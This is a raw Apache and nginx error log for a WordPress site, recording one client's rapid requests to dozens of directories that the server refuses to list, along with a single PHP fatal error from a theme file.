(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:55.353076 2024] [autoindex:error] [pid 7169:tid 140626708338432] [client 146.70.192.108:41714] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:55.577421 2024] [autoindex:error] [pid 7169:tid 140626758694656] [client 146.70.192.108:41716] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:55.805230 2024] [autoindex:error] [pid 7169:tid 140626767087360] [client 146.70.192.108:41718] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:56.030408 2024] [autoindex:error] [pid 7169:tid 140626800658176] [client 146.70.192.108:41720] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:56.817568 2024] [autoindex:error] [pid 8553:tid 140626904606464] [client 146.70.192.108:41726] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:57.039600 2024] [autoindex:error] [pid 8553:tid 140626691553024] [client 146.70.192.108:41728] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:07:44.423725 2024] [autoindex:error] [pid 7169:tid 140626921391872] [client 146.70.192.108:41804] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/11/12 18:07:45 [error] 7128#7128: *975250 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 146.70.192.108, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2024/11/12 18:07:46 [error] 7128#7128: *975250 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 146.70.192.108, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Tue Nov 12 18:08:03.747524 2024] [autoindex:error] [pid 7168:tid 140626716731136] [client 146.70.192.108:41838] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:07.173109 2024] [autoindex:error] [pid 7168:tid 140626699945728] [client 146.70.192.108:41846] AH01276: Cannot serve directory /home/investig/public_html/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:10.115491 2024] [autoindex:error] [pid 8553:tid 140626783872768] [client 146.70.192.108:41864] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:18.492582 2024] [autoindex:error] [pid 7168:tid 140626725123840] [client 146.70.192.108:41888] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:20.041552 2024] [autoindex:error] [pid 7168:tid 140626683160320] [client 146.70.192.108:41892] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:20.263549 2024] [autoindex:error] [pid 7168:tid 140626657982208] [client 146.70.192.108:41894] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:20.490022 2024] [autoindex:error] [pid 7168:tid 140626775480064] [client 146.70.192.108:41896] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:20.712342 2024] [autoindex:error] [pid 7168:tid 140626800658176] [client 146.70.192.108:41898] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:22.514632 2024] [autoindex:error] [pid 7168:tid 140626716731136] [client 146.70.192.108:41902] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jcrop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:22.737647 2024] [autoindex:error] [pid 8553:tid 140626912999168] [client 146.70.192.108:41904] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/random_compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:22.985249 2024] [autoindex:error] [pid 7169:tid 140626649589504] [client 146.70.192.108:41906] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:23.208498 2024] [autoindex:error] [pid 7170:tid 140626904606464] [client 146.70.192.108:41908] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:23.432608 2024] [autoindex:error] [pid 8553:tid 140626657982208] [client 146.70.192.108:41910] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:23.655783 2024] [autoindex:error] [pid 7168:tid 140626809050880] [client 146.70.192.108:41912] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:23.932437 2024] [autoindex:error] [pid 7169:tid 140626904606464] [client 146.70.192.108:41914] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:24.155649 2024] [autoindex:error] [pid 7168:tid 140626699945728] [client 146.70.192.108:41916] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:24.402437 2024] [autoindex:error] [pid 7169:tid 140626817443584] [client 146.70.192.108:41918] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:24.625614 2024] [autoindex:error] [pid 8553:tid 140626725123840] [client 146.70.192.108:41920] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/php-compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:27.835444 2024] [autoindex:error] [pid 7170:tid 140626825836288] [client 146.70.192.108:41926] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:28.059528 2024] [autoindex:error] [pid 7169:tid 140626657982208] [client 146.70.192.108:41928] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:28.312621 2024] [autoindex:error] [pid 7170:tid 140626649589504] [client 146.70.192.108:41930] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:34.015476 2024] [autoindex:error] [pid 7169:tid 140626683160320] [client 146.70.192.108:41940] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/utils/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:34.300720 2024] [autoindex:error] [pid 7169:tid 140626666374912] [client 146.70.192.108:41942] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:34.523263 2024] [autoindex:error] [pid 7169:tid 140626691553024] [client 146.70.192.108:41944] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/crop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:34.745666 2024] [autoindex:error] [pid 7169:tid 140626708338432] [client 146.70.192.108:41946] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:34.967928 2024] [autoindex:error] [pid 7170:tid 140626783872768] [client 146.70.192.108:41948] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:35.191540 2024] [autoindex:error] [pid 8553:tid 140626825836288] [client 146.70.192.108:41950] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/mediaelement/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:35.419150 2024] [autoindex:error] [pid 7170:tid 140626817443584] [client 146.70.192.108:41952] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:36.991302 2024] [autoindex:error] [pid 7168:tid 140626767087360] [client 146.70.192.108:41956] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:37.213815 2024] [autoindex:error] [pid 7168:tid 140626741909248] [client 146.70.192.108:41958] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:37.454546 2024] [autoindex:error] [pid 7168:tid 140626666374912] [client 146.70.192.108:41960] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:37.677675 2024] [autoindex:error] [pid 7168:tid 140626691553024] [client 146.70.192.108:41962] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/block-directory/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:40.569658 2024] [autoindex:error] [pid 7170:tid 140626733516544] [client 146.70.192.108:41968] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:44.759830 2024] [autoindex:error] [pid 8553:tid 140626792265472] [client 146.70.192.108:41976] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentytwentytwo/inc/patterns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:44.982429 2024] [autoindex:error] [pid 7169:tid 140626767087360] [client 146.70.192.108:41978] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentynineteen/inc/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:08:46.775544 2024] [:error] [pid 7170:tid 140626800658176] [client 146.70.192.108:41982] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwentyone/index.php:17 [Tue Nov 12 18:08:46.775664 2024] [:error] [pid 7170:tid 140626800658176] [client 146.70.192.108:41982] Stack trace: [Tue Nov 12 18:08:46.775685 2024] [:error] [pid 7170:tid 140626800658176] [client 146.70.192.108:41982] #0 {main} [Tue Nov 12 18:08:46.775814 2024] [:error] [pid 7170:tid 140626800658176] [client 146.70.192.108:41982] thrown in /home/investig/public_html/wp-content/themes/twentytwentyone/index.php on line 17 [Tue Nov 12 18:09:05.582039 2024] [autoindex:error] [pid 7169:tid 140626733516544] [client 146.70.192.108:42016] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:11.665788 2024] [authz_core:error] [pid 8553:tid 140626733516544] [client 146.70.192.108:42036] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/ [Tue Nov 12 18:09:51.005751 2024] [autoindex:error] [pid 8553:tid 140626758694656] [client 146.70.192.108:42104] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/wlw/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:51.237471 2024] [autoindex:error] [pid 7170:tid 140626775480064] [client 146.70.192.108:42106] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:51.460598 2024] [autoindex:error] [pid 7170:tid 140626699945728] [client 146.70.192.108:42108] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/theme-compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:51.683079 2024] [autoindex:error] [pid 7168:tid 140626741909248] [client 146.70.192.108:42110] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:51.914593 2024] [autoindex:error] [pid 7169:tid 140626825836288] [client 146.70.192.108:42112] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:52.137434 2024] [autoindex:error] [pid 7169:tid 140626783872768] [client 146.70.192.108:42114] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/nux/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:52.361085 2024] [autoindex:error] [pid 7169:tid 140626649589504] [client 146.70.192.108:42116] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:52.589921 2024] [autoindex:error] [pid 7169:tid 140626904606464] [client 146.70.192.108:42118] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/dist/vendor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:56.233286 2024] [autoindex:error] [pid 7169:tid 140626817443584] [client 146.70.192.108:42128] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:56.456589 2024] [autoindex:error] [pid 8553:tid 140626809050880] [client 146.70.192.108:42130] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:56.678782 2024] [autoindex:error] [pid 7169:tid 140626657982208] [client 146.70.192.108:42132] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:56.914705 2024] [autoindex:error] [pid 7168:tid 140626666374912] [client 146.70.192.108:42134] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/light/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:57.137896 2024] [autoindex:error] [pid 7169:tid 140626725123840] [client 146.70.192.108:42136] AH01276: Cannot serve directory 